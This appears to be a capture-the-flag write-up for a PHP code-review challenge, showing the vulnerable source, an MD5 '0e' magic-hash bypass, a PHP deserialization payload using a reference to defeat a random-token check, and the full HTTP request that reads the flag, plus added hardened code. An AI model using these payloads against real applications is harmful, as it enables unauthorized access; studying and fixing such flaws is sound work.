BUU CODE REVIEW 11

Challenge link
First, look at the code:

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

Looking at the code, we can see that solving this challenge takes the following steps:

1. Supply the expected values for pleaseget and pleasepost via a GET and a POST parameter respectively

Appending ?pleaseget=1 to the URL completes the first step.
Then, by switching the request method from GET to POST, we can send pleasepost in the request body.

2. MD5 bypass

Because in PHP a string of the form 0e followed by digits is treated as the number 0 under loose (==) comparison, we can bypass the md5 check by supplying two different values whose MD5 hashes both begin with 0e.

3. Serialization and deserialization

Analysing the code, we can see that obj must be the serialized form of a BUU object; once it is unserialized, the object's __destruct function runs:

    public function __destruct() {
        try {
            $this->correct = base64_encode(uniqid());
            if($this->correct === $this->input) {
                echo file_get_contents("/flag");
            }
        } catch (Exception $e) {
        }
    }
But there is one more check inside the function. Since the generated correct is purely random, we cannot bypass it by prediction; however, we can make input a PHP reference (&) to correct, so that no matter how correct changes, input always holds the same value. The code to generate the serialized payload is:
<?php
class BUU {
    public $correct = "";
    public $input = "";
}
$fff = new BUU();
$fff->input = &$fff->correct;   // make input a reference to correct
echo serialize($fff);
?>

The result is O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;} (R:2 is a back-reference: slot 1 is the object itself, slot 2 is its correct property, so input becomes a reference to correct).
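To make the two weaknesses from steps 2 and 3 concrete from the defender's side, here is an added example (not code from the original post or the challenge) that reproduces each weak check beside a hardened form; the check() method is assumed here as a stand-in for the challenge's __destruct, and SafeBUU is a hypothetical hardened class.

```php
<?php
// Added example, not code from the original post: each weak check from the
// challenge is reproduced next to a hardened form. Run with `php demo.php`.

// --- Check 1: MD5 digests compared with == -----------------------------
// Both digests below are "0e" followed only by digits, which PHP's loose
// comparison reads as numeric 0, so md5($a) == md5($b) although $a != $b.
function weakMd5Check(string $a, string $b): bool {
    return md5($a) == md5($b) && $a != $b;
}
// Hardened: hash_equals compares the digests as strings, in constant time.
function strictMd5Check(string $a, string $b): bool {
    return hash_equals(md5($a), md5($b)) && $a !== $b;
}

// --- Check 2: secret stored in a property of an attacker-supplied object ---
class BUU {
    public $correct = "";
    public $input = "";
    public function check(): bool {
        $this->correct = base64_encode(uniqid());
        // If $input was unserialized as a reference (R:2) to $correct,
        // it aliases whatever was just written, so === holds.
        return $this->correct === $this->input;
    }
}
// Hardened (hypothetical): the secret lives in a local variable that no
// unserialized property can alias, and the comparison is constant-time.
class SafeBUU {
    public $correct = "";
    public $input = "";
    public function check(): bool {
        $correct = base64_encode(uniqid());
        return hash_equals($correct, (string) $this->input);
    }
}

// Payload shapes from the write-up; the second only changes the class name.
$weak = unserialize('O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}');
$safe = unserialize(
    'O:7:"SafeBUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}',
    ['allowed_classes' => ['SafeBUU']]   // never let the sender pick the class
);

var_dump(weakMd5Check("QNKCDZO", "240610708"));   // loose ==: both digests read as 0
var_dump(strictMd5Check("QNKCDZO", "240610708")); // string compare: digests differ
var_dump($weak->check());   // $input aliases $correct through the R:2 reference
var_dump($safe->check());   // the local $correct cannot be aliased from the payload
```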

Final request:

POST /?pleaseget=1 HTTP/1.1
Host: 7c70169c-99eb-438e-a98d-1b1424d076ee.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-GPC: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

pleasepost=2&md51=QNKCDZO&md52=240610708&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}
posted @ 2025-05-13 18:43  Mikasa_Ackerman